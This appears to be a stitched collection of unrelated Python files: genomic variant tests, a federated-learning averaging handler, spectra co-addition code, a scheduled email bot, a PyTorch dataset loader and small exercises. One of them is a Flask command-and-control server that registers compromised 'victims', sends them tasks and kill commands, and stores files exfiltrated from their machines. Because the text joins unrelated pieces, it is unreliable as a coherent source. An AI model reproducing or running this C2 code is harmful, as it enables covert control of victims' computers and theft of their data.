"end": {"type": "point", "position": 10},
},
"inserted": [{"sequence": "T", "source": "description"}],
}
],
},
),
(
"NG_012337.3:10:CT:T",
{
"seq_id": "NG_012337.3",
"position": 10,
"deleted_sequence": "CT",
"inserted_sequence": "T",
},
{
"type": "description_dna",
"reference": {"id": "NG_012337.3"},
"variants": [
{
"type": "deletion_insertion",
"location": {
"type": "range",
"start": {"type": "point", "position": 10},
"end": {"type": "point", "position": 12},
},
"deleted": [{"sequence": "CT", "source": "description"}],
"inserted": [{"sequence": "T", "source": "description"}],
}
],
},
),
(
"NG_012337.3:10:2:T",
{
"seq_id": "NG_012337.3",
"position": 10,
"deleted_length": 2,
"inserted_sequence": "T",
},
{
"type": "description_dna",
"reference": {"id": "NG_012337.3"},
"variants": [
{
"type": "deletion_insertion",
"location": {
"type": "range",
"start": {"type": "point", "position": 10},
"end": {"type": "point", "position": 12},
},
"inserted": [{"sequence": "T", "source": "description"}],
}
],
},
),
(
"NG_012337.3:10:2:",
{
"seq_id": "NG_012337.3",
"position": 10,
"deleted_length": 2,
},
{
"type": "description_dna",
"reference": {"id": "NG_012337.3"},
"variants": [
{
"type": "deletion_insertion",
"location": {
"type": "range",
"start": {"type": "point", "position": 10},
"end": {"type": "point", "position": 12},
},
}
],
},
),
(
"NG_012337.3:10:CT:",
{
"seq_id": "NG_012337.3",
"position": 10,
"deleted_sequence": "CT",
},
{
"type": "description_dna",
"reference": {"id": "NG_012337.3"},
"variants": [
{
"type": "deletion_insertion",
"location": {
"type": "range",
"start": {"type": "point", "position": 10},
"end": {"type": "point", "position": 12},
},
"deleted": [{"sequence": "CT", "source": "description"}],
}
],
},
),
(
"NG_012337.3:10::",
{
"seq_id": "NG_012337.3",
"position": 10,
},
{
"type": "description_dna",
"reference": {"id": "NG_012337.3"},
"variants": [
{
"type": "deletion_insertion",
"location": {
"type": "range",
"start": {"type": "point", "position": 10},
"end": {"type": "point", "position": 11},
},
"inserted": [
{
"location": {
"type": "range",
"start": {"type": "point", "position": 10},
"end": {"type": "point", "position": 11},
},
"source": "reference",
}
],
}
],
},
),
(
"NP_003997.1:1:M:RSTV",
{
"seq_id": "NP_003997.1",
"position": 1,
"deleted_sequence": "M",
"inserted_sequence": "RSTV",
},
{
"type": "description_dna",
"reference": {"id": "NP_003997.1"},
"variants": [
{
"type": "deletion_insertion",
"location": {
"type": "range",
"start": {"type": "point", "position": 1},
"end": {"type": "point", "position": 2},
},
"deleted": [{"sequence": "M", "source": "description"}],
"inserted": [{"sequence": "RSTV", "source": "description"}],
}
],
},
),
(
"NM_003002.2:273:g:u",
{
"seq_id": "NM_003002.2",
"position": 273,
"deleted_sequence": "g",
"inserted_sequence": "u",
},
{
"type": "description_dna",
"reference": {"id": "NM_003002.2"},
"variants": [
{
"type": "deletion_insertion",
"location": {
"type": "range",
"start": {"type": "point", "position": 273},
"end": {"type": "point", "position": 274},
},
"deleted": [{"sequence": "g", "source": "description"}],
"inserted": [{"sequence": "u", "source": "description"}],
}
],
},
),
]
@pytest.mark.parametrize(
"description, model",
[(t[0], t[1]) for t in TESTS_SET],
)
def test_to_spdi_model(description, model):
assert to_spdi_model(description) == model
@pytest.mark.parametrize(
"description, model",
[(t[0], t[2]) for t in TESTS_SET],
)
def test_to_hgvs_internal_model(description, model):
assert to_hgvs_internal_model(description) == model
|
nilq/baby-python
|
python
|
"""
Licensed Materials - Property of IBM
Restricted Materials of IBM
20190891
© Copyright IBM Corp. 2021 All Rights Reserved.
"""
"""
Module to where fusion algorithms are implemented.
"""
import logging
import numpy as np
from ibmfl.aggregator.fusion.iter_avg_fusion_handler import \
IterAvgFusionHandler
logger = logging.getLogger(__name__)
class RLFusionHandler(IterAvgFusionHandler):
"""
    Class for weight-based Federated Averaging aggregation.
In this class, the simple averaging aggregation is performed over the RL
policy model weights.
"""
def __init__(self, hyperparams, protocol_handler,
fl_model=None,
data_handler=None,
**kwargs):
super().__init__(hyperparams,
protocol_handler,
data_handler,
fl_model,
**kwargs)
self.name = "RLAvgFusion"
def fusion_collected_responses(self, lst_model_updates):
"""
        Receives a list of model updates, where each model update is of type
        `ModelUpdate`. Using the weights included in each model update, it
        finds the mean of the weights per layer (indicated by key).
:param lst_model_updates: List of model updates of type `ModelUpdate` \
to be averaged.
        :type lst_model_updates: `list`
:return: results after aggregation
:rtype: `dict`
"""
weights = dict()
# Key list gives layers of the neural network
weights_key_list = list(lst_model_updates[0].get('weights').keys())
        # Iterate through the layers of the neural network
for key in weights_key_list:
w = []
for update in lst_model_updates:
w.append(np.array(update.get('weights').get(key)))
avg_weight = np.mean(np.array(w), axis=0)
weights[key] = avg_weight
return weights
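# A minimal standalone sketch of the same per-layer averaging, using plain dicts in
# place of `ModelUpdate` objects (purely illustrative; not part of the ibmfl API).
if __name__ == "__main__":
    _updates = [
        {"weights": {"layer_1": [1.0, 2.0], "layer_2": [0.0]}},
        {"weights": {"layer_1": [3.0, 4.0], "layer_2": [2.0]}},
    ]
    _avg = {key: np.mean(np.array([u["weights"][key] for u in _updates]), axis=0)
            for key in _updates[0]["weights"]}
    print(_avg)  # {'layer_1': array([2., 3.]), 'layer_2': array([1.])}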
|
nilq/baby-python
|
python
|
from lark import Tree
from copy import deepcopy
from .values import Value, ValueType
from .symbols import Symbol, Symbols
from .debug import DebugOutput
from .converters import get_symbol_name_from_key_item, get_array_index_exp_token_from_key_item
from . import blocks
from . import expressions
class Key():
def __init__(self, token: Tree, current_block):
self.key_items = []
for key_item in token.children:
symbol_name = get_symbol_name_from_key_item(key_item)
array_index_exp_token = get_array_index_exp_token_from_key_item(
key_item)
if array_index_exp_token:
array_index_exp = expressions.Expression(
array_index_exp_token, current_block)
else:
array_index_exp = None
key_item = {
"symbol_name": symbol_name,
"array_index_exp": array_index_exp,
}
self.key_items.append(key_item)
self.current_block = current_block
def get_value(self) -> Value:
value = self.__search_recursively()
return deepcopy(value)
def set_value(self, value: Value):
key_value = self.__search_recursively()
key_value.assign_value(value)
def set_value_in_python(self, value_in_python):
value = self.__search_recursively()
value.assign_value_in_python(value_in_python)
def __search_recursively(self) -> Value:
# Do one level only here
# Fixme
value = None
block = self.current_block
for key_item in self.key_items:
symbol_name = key_item['symbol_name']
array_index_exp = key_item['array_index_exp']
symbol = block.search_symbol_by_name_recursively(symbol_name)
if not symbol:
return None
if array_index_exp:
value = symbol.value.value_in_python[int(array_index_exp.get_value().value_in_python)]
else:
value = symbol.value
if not isinstance(value.value_type, blocks.TypeBlock):
break
else:
block = value.value_in_python
return value
def debug_output(self):
DebugOutput.output_block_attr("key")
DebugOutput.increase_depth()
DebugOutput.output(self.key_items)
DebugOutput.decrease_depth()
|
nilq/baby-python
|
python
|
numero = int(input('Enter your number: '))
x = 0
while x <= numero:
    if x % 2 == 0:
        print(x)
    x = x + 1
|
nilq/baby-python
|
python
|
# -*- coding: utf-8 -*-
"""Package to support metabarcoding read trimmming, merging, and quantitation."""
import os
__version__ = "0.1.0-alpha"
_ROOT = os.path.abspath(os.path.dirname(__file__))
ADAPTER_PATH = os.path.join(_ROOT, "data", "TruSeq3-PE.fa")
|
nilq/baby-python
|
python
|
import numpy as np
import pylab as pl
from astropy.io import fits
from astropy.table import Table
from linetools.spectra.io import readspec
from linetools.spectra.xspectrum1d import XSpectrum1D
from linetools.spectra.utils import collate
from pypeit.core import coadd as arco
from astropy import units as u
"""Main module for co-addition of 1-d spectra"""
def coadd_stis_from_x1dfiles_old(filenames, wv_array=None, rebin=None, debug=False):
"""
Parameters
----------
filenames : list
List of filenames with x1d STIS data
Must be of the same object and same
configuration
wv_array : Quantity array
Wavelength array to perform the co-add
rebin : int, optional
If given, it rebins the current sampling by
rebin number of pixels
Returns
-------
spec1d : XSpectrum1D
Co-added version of all the spectra
"""
spec_list = []
for filename in filenames:
aux = load_single_x1d_stis(filename, debug=debug)
for sp in aux:
spec_list += [sp]
# spec_list contains all echelle orders from different files and multi-extensions
specs = collate(spec_list) # now all in a single XSpectrum1D object
if wv_array is None:
# bring them to a unique native wavelength grid using PYPIT
cat_wave = arco.new_wave_grid(specs.data['wave'], wave_method='velocity')
else:
cat_wave = wv_array.to('AA').value
if rebin is not None:
rebin = int(rebin)
cat_wave = cat_wave[::rebin]
specs = specs.rebin(cat_wave*u.AA, all=True, do_sig=True, masking='none',grow_bad_sig=True)
# estimate weights for coaddition (PYPYT)
sn2, weights = arco.sn_weight(specs, smask=None)
# coaddition
spec1d = arco.one_d_coadd(specs, weights)
return spec1d
def coadd_stis_from_x1dfiles(filenames, wv_array=None, rebin=None, debug=True):
"""
Parameters
----------
filenames : list
List of filenames with x1d STIS data
Must be of the same object and same
configuration
wv_array : Quantity array
Wavelength array to perform the co-add
rebin : int, optional
If given, it rebins the current sampling by
rebin number of pixels
Returns
-------
spec1d : XSpectrum1D
Co-added version of all the spectra
"""
spec_list = []
for filename in filenames:
aux = load_single_x1d_stis(filename, debug=debug)
for sp in aux:
spec_list += [sp]
# spec_list contains all echelle orders from different files and multi-extensions
specs = collate(spec_list) # now all in a single XSpectrum1D object
if wv_array is None:
# bring them to a unique native wavelength grid using PYPIT
cat_wave = arco.new_wave_grid(specs.data['wave'], wave_method='velocity')
else:
cat_wave = wv_array.to('AA').value
if rebin is not None:
rebin = int(rebin)
cat_wave = cat_wave[::rebin]
specs = specs.rebin(cat_wave*u.AA, all=True, do_sig=True, masking='none',grow_bad_sig=True)
    # estimate weights for coaddition (PYPIT)
    sn2, weights = arco.sn_weight(specs, smask=None)
    # coaddition
    spec1d = arco.one_d_coadd(specs, None, weights)
# spec1d = arco.coadd_spectra(specs, wave_grid_method='velocity', scale_method='auto')
return spec1d
def load_single_x1d_stis(filename, debug=False):
"""
Parameters
----------
filename : str
Filename of the fits x1d STIS file
        Could be multi-extension
Returns
-------
spec_list : list of XSpectrum1D objects, one for each echelle order
of the single STIS x1d file
"""
# get number of extensions
head = fits.getheader(filename, ext=0)
numext = head['NEXTEND']
spec_list = [] # store XSpectrum1D here.
for ext in range(1, numext + 1):
sp = fits.getdata(filename, ext=ext)
print("Loading echelle orders from file {}, ext={}".format(filename, ext))
for ii in range(len(sp.SPORDER)):
# chop pixels at edges of orders (i.e. poor sensitivity)
nchop_blue = 5
nchop_red = 50
fl = sp.FLUX[ii][nchop_blue:-nchop_red]
er = sp.ERROR[ii][nchop_blue:-nchop_red]
wv = sp.WAVELENGTH[ii][nchop_blue:-nchop_red]
spec = XSpectrum1D.from_tuple((wv,fl,er))
spec_list += [spec]
if debug:
pl.plot(sp.WAVELENGTH[ii], sp.FLUX[ii], drawstyle='steps-mid')
pl.plot(sp.WAVELENGTH[ii], sp.ERROR[ii], ":")
return spec_list
def coadd_cos_from_x1dfiles(filenames, wv_array=None, A_pix=0.01*u.AA):
spec_list = []
#TODO: mask out x1d spectral regions with bad values.
for filename in filenames:
sp = readspec(filename)
import pdb; pdb.set_trace()
# mask =
spec_list += [sp]
# spec_list contains all individual spectra
specs = collate(spec_list) # now all in a single XSpectrum1D object
#rebin
if wv_array is None:
# bring them to a unique native wavelength grid using PYPIT
A_pix = A_pix.to("AA").value
cat_wave = arco.new_wave_grid(specs.data['wave'], wave_method='pixel', A_pix=A_pix)
else:
cat_wave = wv_array.to('AA').value
specs = specs.rebin(cat_wave*u.AA, all=True, do_sig=True, masking='none',grow_bad_sig=True)
    # estimate weights for coaddition (PYPIT)
sn2, weights = arco.sn_weight(specs)
# coaddition
spec1d = arco.one_d_coadd(specs, weights)
return spec1d
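# Minimal usage sketch (the x1d filenames below are hypothetical placeholders for real
# HST/STIS echelle spectra of the same target and configuration):
#
#     spec = coadd_stis_from_x1dfiles(["o12345010_x1d.fits", "o12345020_x1d.fits"], rebin=2)
#     spec.write_to_fits("coadd_stis.fits")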
|
nilq/baby-python
|
python
|
import findspark
findspark.init('/opt/spark')
import schedule
import pyspark
from pyspark.sql import SparkSession
from pyspark.sql.functions import col, udf, lit
import random
import smtplib, ssl
from email.mime.text import MIMEText
from email.mime.multipart import MIMEMultipart
import time
from random import randrange
from datetime import date
from datetime import datetime
def get_spark_session():
return SparkSession.builder.master('local[*]')\
.config("spark.driver.memory", "12G").appName('EmailSender').getOrCreate()
def get_ingest_information():
spark = get_spark_session()
return spark.read.option('header', True).option('inferSchema', True)\
.option('delimiter', '|').csv('ingestor')
def get_avaliable_message(id_message=None):
df = get_ingest_information()
if id_message is None:
messages_avaliable = df.filter(col('processado').isNull()).collect()
return [random.choice(messages_avaliable)]
else:
return df.filter((col('processado').isNull()) & (col('id') == id_message)).collect()
def get_html_string(header, text):
return """
<!DOCTYPE HTML PUBLIC "-//W3C//DTD XHTML 1.0 Transitional //EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:v="urn:schemas-microsoft-com:vml" xmlns:o="urn:schemas-microsoft-com:office:office">
<head>
<!--[if gte mso 9]>
<xml>
<o:OfficeDocumentSettings>
<o:AllowPNG/>
<o:PixelsPerInch>96</o:PixelsPerInch>
</o:OfficeDocumentSettings>
</xml>
<![endif]-->
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<meta name="x-apple-disable-message-reformatting">
<!--[if !mso]><!--><meta http-equiv="X-UA-Compatible" content="IE=edge"><!--<![endif]-->
<title></title>
<style type="text/css">
table, td {{ color: #000000; }} @media only screen and (min-width: 670px) {{
.u-row {{
width: 80% !important;
}}
.u-row .u-col {{
vertical-align: top;
}}
.u-row .u-col-100 {{
width: 80% !important;
}}
}}
@media (max-width: 670px) {{
.u-row-container {{
max-width: 100% !important;
padding-left: 0px !important;
padding-right: 0px !important;
}}
.u-row .u-col {{
min-width: 320px !important;
max-width: 100% !important;
display: block !important;
}}
.u-row {{
width: calc(100% - 40px) !important;
}}
.u-col {{
width: 100% !important;
}}
.u-col > div {{
margin: 0 auto;
}}
}}
body {{
margin: 0;
padding: 0;
}}
table,
tr,
td {{
vertical-align: top;
border-collapse: collapse;
}}
p {{
margin: 0;
}}
.ie-container table,
.mso-container table {{
table-layout: fixed;
}}
* {{
line-height: inherit;
}}
a[x-apple-data-detectors='true'] {{
color: inherit !important;
text-decoration: none !important;
}}
</style>
<!--[if !mso]><!--><link href="https://fonts.googleapis.com/css?family=Lato:400,700&display=swap" rel="stylesheet" type="text/css"><link href="https://fonts.googleapis.com/css?family=Playfair+Display:400,700&display=swap" rel="stylesheet" type="text/css"><!--<![endif]-->
</head>
<body class="clean-body" style="margin: 0;padding: 0;-webkit-text-size-adjust: 100%;background-color: #f9f9f9;color: #000000">
<!--[if IE]><div class="ie-container"><![endif]-->
<!--[if mso]><div class="mso-container"><![endif]-->
<table style="border-collapse: collapse;table-layout: fixed;border-spacing: 0;mso-table-lspace: 0pt;mso-table-rspace: 0pt;vertical-align: top;min-width: 320px;Margin: 0 auto;background-color: #f9f9f9;width:100%" cellpadding="0" cellspacing="0">
<tbody>
<tr style="vertical-align: top">
<td style="word-break: break-word;border-collapse: collapse !important;vertical-align: top">
<!--[if (mso)|(IE)]><table width="100%" cellpadding="0" cellspacing="0" border="0"><tr><td align="center" style="background-color: #f9f9f9;"><![endif]-->
<div class="u-row-container" style="padding: 0px;background-color: transparent">
<div class="u-row" style="Margin: 0 auto;min-width: 320px;max-width: 80%;overflow-wrap: break-word;word-wrap: break-word;word-break: break-word;background-color: #ffffff;">
<div style="border-collapse: collapse;display: table;width: 100%;background-color: transparent;">
<!--[if (mso)|(IE)]><table width="100%" cellpadding="0" cellspacing="0" border="0"><tr><td style="padding: 0px;background-color: transparent;" align="center"><table cellpadding="0" cellspacing="0" border="0" style="width:80%;"><tr style="background-color: #ffffff;"><![endif]-->
<!--[if (mso)|(IE)]><td align="center" width="80%" style="width: 80%;padding: 0px;border-top: 0px solid transparent;border-left: 0px solid transparent;border-right: 0px solid transparent;border-bottom: 0px solid transparent;" valign="top"><![endif]-->
<div class="u-col u-col-100" style="max-width: 320px;min-width: 80%;display: table-cell;vertical-align: top;">
<div style="width: 100% !important;">
<!--[if (!mso)&(!IE)]><!--><div style="padding: 0px;border-top: 0px solid transparent;border-left: 0px solid transparent;border-right: 0px solid transparent;border-bottom: 0px solid transparent;"><!--<![endif]-->
<table style="font-family:tahoma,arial,helvetica,sans-serif;" role="presentation" cellpadding="0" cellspacing="0" width="100%" border="0">
<tbody>
<tr>
<td style="overflow-wrap:break-word;word-break:break-word;padding:30px 10px 10px;font-family:tahoma,arial,helvetica,sans-serif;" align="left">
<div style="color: #333333; line-height: 140%; text-align: left; word-wrap: break-word;">
<p style="font-size: 14px; line-height: 140%; text-align: center;"><span style="font-size: 28px; line-height: 39.2px; font-family: 'Playfair Display', serif; color: #000000;">{0}</span></p>
</div>
</td>
</tr>
</tbody>
</table>
<table style="font-family:tahoma,arial,helvetica,sans-serif;" role="presentation" cellpadding="0" cellspacing="0" width="100%" border="0">
<tbody>
<tr>
<td style="overflow-wrap:break-word;word-break:break-word;padding:10px;font-family:tahoma,arial,helvetica,sans-serif;" align="left">
<table height="0px" align="center" border="0" cellpadding="0" cellspacing="0" width="15%" style="border-collapse: collapse;table-layout: fixed;border-spacing: 0;mso-table-lspace: 0pt;mso-table-rspace: 0pt;vertical-align: top;border-top: 3px solid #ff0009;-ms-text-size-adjust: 100%;-webkit-text-size-adjust: 100%">
<tbody>
<tr style="vertical-align: top">
<td style="word-break: break-word;border-collapse: collapse !important;vertical-align: top;font-size: 0px;line-height: 0px;mso-line-height-rule: exactly;-ms-text-size-adjust: 100%;-webkit-text-size-adjust: 100%">
<span> </span>
</td>
</tr>
</tbody>
</table>
</td>
</tr>
</tbody>
</table>
<table style="font-family:tahoma,arial,helvetica,sans-serif;" role="presentation" cellpadding="0" cellspacing="0" width="100%" border="0">
<tbody>
<tr>
<td style="overflow-wrap:break-word;word-break:break-word;padding:15px 30px 25px;font-family:tahoma,arial,helvetica,sans-serif;" align="left">
<div style="line-height: 150%; text-align: center; word-wrap: break-word;">
<p style="font-size: 14px; line-height: 150%; text-align: center;"><span style="font-size: 16px; line-height: 24px; color: #555555; font-family: Lato, sans-serif;">{1}</span></p>
</div>
<br>
<div style="line-height: 150%; text-align: center; word-wrap: break-word;">
<p style="font-size: 14px; line-height: 150%; text-align: center;"><span style="font-size: 11px; line-height: 24px; color: #555555; font-family: Lato, sans-serif;">Miracle Bot ©</span></p>
</div>
</td>
</tr>
</tbody>
</table>
<!--[if (!mso)&(!IE)]><!--></div><!--<![endif]-->
</div>
</div>
<!--[if (mso)|(IE)]></td><![endif]-->
<!--[if (mso)|(IE)]></tr></table></td></tr></table><![endif]-->
</div>
</div>
</div>
<!--[if (mso)|(IE)]></td></tr></table><![endif]-->
</td>
</tr>
</tbody>
</table>
<!--[if mso]></div><![endif]-->
<!--[if IE]></div><![endif]-->
</body>
</html>
""".format(header, text)
def send_email(_is_first_message):
context = ssl.create_default_context()
sender_email = "Miracle Bot"
receiver_email = "receiver@gmail.com"
if _is_first_message:
message_info = get_avaliable_message(1)
else:
message_info = get_avaliable_message()
if len(message_info) > 0:
message = MIMEMultipart("alternative")
message["Subject"] = message_info[0].assunto
message["From"] = sender_email
message["To"] = receiver_email
html = get_html_string(message_info[0].titulo, message_info[0].mensagem)
part2 = MIMEText(html, "html")
message.attach(part2)
with smtplib.SMTP_SSL("smtp.gmail.com", 465, context=context) as server:
server.login("", "")
server.sendmail(sender_email, receiver_email, message.as_string())
mark_message_as_send(message_info[0].id)
def mark_message_as_send(id_message):
df = get_ingest_information()
df = df.cache()
df_processed = df.filter(col('id') == id_message)
df_processed = df_processed.withColumn('processado', lit(1))
df = df.filter(col('id') != id_message)
df = df.union(df_processed)
df.count()
df.coalesce(1).write.mode('overwrite').option("header", "true").option("delimiter", "|").csv('ingestor')
df.unpersist()
if __name__ == '__main__':
messages_avaliable_count = get_ingest_information().filter(col('processado').isNull()).count()
if messages_avaliable_count > 0:
message_day_and_hour = []
message_days = random.sample(range(date.today().day+2, 30), messages_avaliable_count)
message_hours = [random.choice(range(5, 23)) for i in range(messages_avaliable_count)]
#Test
message_hours.pop()
message_hours.pop()
message_hours.pop()
message_hours.pop()
message_days.pop()
message_days.pop()
message_days.pop()
message_days.pop()
message_days.append(3)
message_hours.append(18)
message_days.append(3)
message_hours.append(19)
message_days.append(3)
message_hours.append(20)
message_days.append(3)
message_hours.append(21)
#Initial message
message_days[0] = 4
message_hours[0] = 0
is_first_message = True
while True:
now = datetime.now()
        for index, day in enumerate(message_days):
            if now.day == day and now.hour == message_hours[index]:
                send_email(is_first_message)
                # pop both lists at the same index so day/hour pairs stay aligned
                message_days.pop(index)
                message_hours.pop(index)
                is_first_message = False
                break
time.sleep(30)
if len(message_days) == 0:
break
|
nilq/baby-python
|
python
|
class Test(object):
__slots__ = 'name', 'word_set', 'target', 'longest_subsequence',\
'verbose', 'actual'
def __init__(self, json_object):
self.name = json_object['name']
self.word_set = json_object['word_set']
self.target = json_object['target']
self.longest_subsequence = json_object['longest_subsequence']
self.verbose = json_object['verbose']
self.actual = None
def __str__(self):
return '{0}:\n\
word_set=[{1}]\n\
target={2}\n\
longest_subsequence={3}\n\
actual={4}'.format(
self.name,
','.join([self._get_quoted(w) for w in self.word_set]),
self._get_quoted(self.target),
self._get_quoted(self.longest_subsequence),
self._get_quoted(self.actual))
def _get_quoted(self, s):
return s if s is None else "'{0}'".format(s)
def run(self, subseq_func):
self.actual = subseq_func(self.target, self.word_set)
try:
assert self.longest_subsequence == self.actual,\
'{0} failure: expected={1}, actual={2}'.format(
self.name, self.longest_subsequence, self.actual)
except AssertionError as ae:
print(ae)
|
nilq/baby-python
|
python
|
numbers = [int(el) for el in input().split(", ")]
positive = [str(x) for x in numbers if x >= 0]
negative = [str(x) for x in numbers if x < 0]
even = [str(x) for x in numbers if x % 2 == 0]
odd = [str(x) for x in numbers if not x % 2 == 0]
print("Positive:", ', '.join(positive))
print("Negative:", ', '.join(negative))
print("Even:", ', '.join(even))
print("Odd:", ', '.join(odd))
|
nilq/baby-python
|
python
|
# ------ your settings ------
TrainModule = 'OutputOshaberi' # your sensation folder name
device = 'cuda' # debugging device
# ------ end of settings -----
if __name__ == '__main__':
from importlib import import_module
from multiprocessing import Value
module = import_module(TrainModule)
func = module.Train(device,True)
shutdown = Value('i',False)
sleep = Value('i',True)
func(shutdown,sleep)
|
nilq/baby-python
|
python
|
year = int(input())
cond = False
if year % 4 == 0:
    cond = True
if year % 100 == 0:
    cond = False
if year % 400 == 0:
    cond = True
if cond:
    print(f"{year} is a Leap Year!!")
else:
    print(f"{year} is not a Leap Year")
|
nilq/baby-python
|
python
|
from flask import Flask,request
import os
import base64
from lib.logger import Logger
from termcolor import colored
import sys
def main(mongoclient,server_logger,port):
app = Flask('app')
## Get the cookie/victim ID from a request
def get_cookie(request):
d = request.cookies
if d:
return base64.b64decode(d.to_dict()['session']).decode()
else:
return False
def get_victim_info(request):
return request.form.to_dict()
## Checks if we are running on docker container
def docker():
return os.path.isfile('/.dockerenv')
####################################### General beacon and sends task ####################################
@app.route('/',methods = ['GET', 'POST'])
def run():
if request.method == 'GET':
victim_id = get_cookie(request)
## Update last seen
if victim_id:
if victim_id in Victim.victims.keys():
victim_obj = Victim.victims[victim_id]
victim_obj.update_last_seen_status_to_db()
server_logger.info_log(f"Updated last seen of {victim_obj.victim_id}")
task = Task.find_unissued_task(victim_id)
## If there is any task
if task:
if task['command'] == 'kill':
task_obj = Task.load_task(task)
task_dict = task_obj.issue_dict()
## Kill the victim by sending 'Die' and also update db
Victim.victims[victim_id].status = 'Dead'
Victim.victims[victim_id].update_last_seen_status_to_db()
return 'Die'
else:
task_obj = Task.load_task(task)
task_dict = task_obj.issue_dict()
server_logger.info_log(f"Task issued, task id - {colored(task_dict['task_id'],'cyan')}",'green')
server_logger.info_log(f"Task info - {task_dict}",'green')
return task_dict
## Default reply of server incase no commands
return 'Nothing Fishy going on here :)'
## Not needed remove.
if request.method == 'POST':
print("Command to exfiltrate recieved...")
if not os.path.exists('./exfiltration'):
os.mkdir('./exfiltration')
            ## 'wb' enables writing binary data
with open('./exfiltration/'+request.headers['Filename'], "wb") as f:
# Write bytes to file
f.write(request.data)
f.close()
return "OK"
####################################### Task output handler ####################################
@app.route('/<cmd>/output/<task_id>',methods = ['POST'])
def task_output(cmd,task_id):
if request.method == 'POST':
victim_id = get_cookie(request)
## Handling for various kind of tasks, also passing the task/module options set by user
output = Module.module_task_id[task_id].handle_task_output(request.data,Task.tasks[task_id].options,victim_id,task_id)
## Checking the output path is the default path, then we only give path from shared/victim/data
if f'shared/victim_data/{victim_id}' in os.path.abspath(output):
output_path = output.split('../../')[1]
else:
output_path = os.path.abspath(output)
server_logger.info_log(f"Recieved task output for task ID - {task_id} , Victim ID - {victim_id} , Command - {cmd}, Output - {colored('File dumped to '+output_path,'cyan')} accessible both though host and container.",'green')
task_obj = Task.tasks[task_id]
task_obj.insert_cmd_output(f"File dumped to {output_path}")
return "OK"
####################################### Staging / Initial request from the victim ####################################
@app.route('/stage_0',methods = ['POST'])
def stage():
if request.method == 'POST':
## Get the victim id of the new victim
victim_id = get_cookie(request)
## Get the other info about the victim
info = get_victim_info(request)
if victim_id not in Victim.victims:
## instantiate a new victim object
victim_obj = Victim(victim_id = victim_id,platform = info['platform'],os_version = info['version'],admin = info['admin'],location= info['location'])
if victim_obj:
server_logger.info_log(f"New victim checked in - {victim_id} , {info['platform']}",'green')
return ('Victim registered', 200)
else:
Victim.victims[victim_id].status = 'Alive'
Victim.victims[victim_id].location = info['location'] ## Incase changed
Victim.victims[victim_id].update_location_to_db()
return ('Victim already registered', 302)
return ('Bad request', 400)
    ####################################### Client Error Received ####################################
@app.route('/clienterror',methods = ['POST'])
def clienterror():
if request.method == 'POST':
server_logger.info_log(f"Recieved error from victim - {request.data.decode('utf-8')}",'yellow')
return ('Error Recieved, we will get back to you', 200)
app.run(host = '0.0.0.0', port = port)
def get_db_info():
if 'MONGODB_USERNAME' not in os.environ:
os.environ['MONGODB_USERNAME'] = ''
if 'MONGODB_PASSWORD' not in os.environ:
os.environ['MONGODB_PASSWORD'] = ''
if 'MONGODB_HOSTNAME' not in os.environ:
os.environ['MONGODB_HOSTNAME'] = '127.0.0.1'
if 'MONGODB_DATABASE' not in os.environ:
os.environ['MONGODB_DATABASE'] = 'SpyderC2'
print(colored("You can set these environment variables - MONGODB_USERNAME , MONGODB_PASSWORD , MONGODB_HOSTNAME , MONGODB_DATABASE",'blue'))
db_url = "mongodb://"
if os.environ['MONGODB_USERNAME'] != '' and os.environ['MONGODB_PASSWORD'] != '':
db_url += f"{os.environ['MONGODB_USERNAME']}:{os.environ['MONGODB_PASSWORD']}@"
db_url += f"{os.environ['MONGODB_HOSTNAME']}:27017/{os.environ['MONGODB_DATABASE']}"
return db_url
if __name__=="__main__":
if len(sys.argv) >= 2:
port = sys.argv[1]
else:
port = '8080'
server_logger = Logger(logdir='logs',logfile='logs',verbose=False )
server_logger.setup()
db_url = get_db_info()
from lib.database import Database
from lib.module import Module
from lib.task import Task
from lib.victim import Victim
db_object = Database(url=db_url)
server_logger.info_log(f"Initiated database connection from main- {db_url}",'green')
Victim.mongoclient = db_object.mongoclient
Task.mongoclient = db_object.mongoclient
if db_object.db_data_exists():
db_object.load_db_data()
main(db_object.mongoclient,server_logger,port)
|
nilq/baby-python
|
python
|
'''
PyTorch Dataset handling. The dataset folder should contain two subfolders, "train" and "test",
each of which has one subfolder per class, named after that class.
'''
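# An illustrative layout the loaders below expect (folder and class names are hypothetical):
#
#   dataset/
#       train/
#           class_a/  img_001.jpg, img_002.jpg, ...
#           class_b/  ...
#       test/
#           class_a/  ...
#           class_b/  ...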
import os
import glob
import cv2
import torch
from torch.utils.data import Dataset
class LoadDataset(Dataset):
'''Loads the dataset from the given path.
'''
def __init__(self, dataset_folder_path, image_size=128, image_depth=3, train=True, transform=None):
'''Parameter Init.
'''
        assert dataset_folder_path is not None, "Path to the dataset folder must be provided!"
self.dataset_folder_path = dataset_folder_path
self.transform = transform
self.image_size = image_size
self.image_depth = image_depth
self.train = train
self.classes = sorted(self.get_classnames())
self.image_path_label = self.read_folder()
def get_classnames(self):
'''Returns the name of the classes in the dataset.
'''
return os.listdir(f"{self.dataset_folder_path.rstrip('/')}/train/" )
def read_folder(self):
'''Reads the folder for the images with their corresponding label (foldername).
'''
image_path_label = []
if self.train:
folder_path = f"{self.dataset_folder_path.rstrip('/')}/train/"
else:
folder_path = f"{self.dataset_folder_path.rstrip('/')}/test/"
for x in glob.glob(folder_path + "**", recursive=True):
if not x.endswith('jpg'):
continue
class_idx = self.classes.index(x.split('/')[-2])
image_path_label.append((x, int(class_idx)))
return image_path_label
def __len__(self):
'''Returns the total size of the data.
'''
return len(self.image_path_label)
def __getitem__(self, idx):
'''Returns a single image and its corresponding label.
'''
if torch.is_tensor(idx):
idx = idx.tolist()
image, label = self.image_path_label[idx]
if self.image_depth == 1:
image = cv2.imread(image, 0)
else:
image = cv2.imread(image)
image = cv2.cvtColor(image, cv2.COLOR_BGR2RGB)
image = cv2.resize(image, (self.image_size, self.image_size))
if self.transform:
image = self.transform(image)
return {
'image': image,
'label': label
}
class LoadInputImages(Dataset):
'''Loads the dataset for visualization.
'''
def __init__(self, input_folder, image_size, image_depth, transform=None):
'''Param init.
'''
self.input_folder = input_folder.rstrip('/') + '/'
self.image_size = image_size
self.image_depth = image_depth
self.transform = transform
self.image_paths = self.read_folder()
def read_folder(self):
'''Reads all the image paths in the given folder.
'''
image_paths = []
for x in glob.glob(self.input_folder + '**'):
if not x.endswith('jpg'):
continue
image_paths.append(x)
return image_paths
def __len__(self):
'''Returns the total number of images in the folder.
'''
return len(self.image_paths)
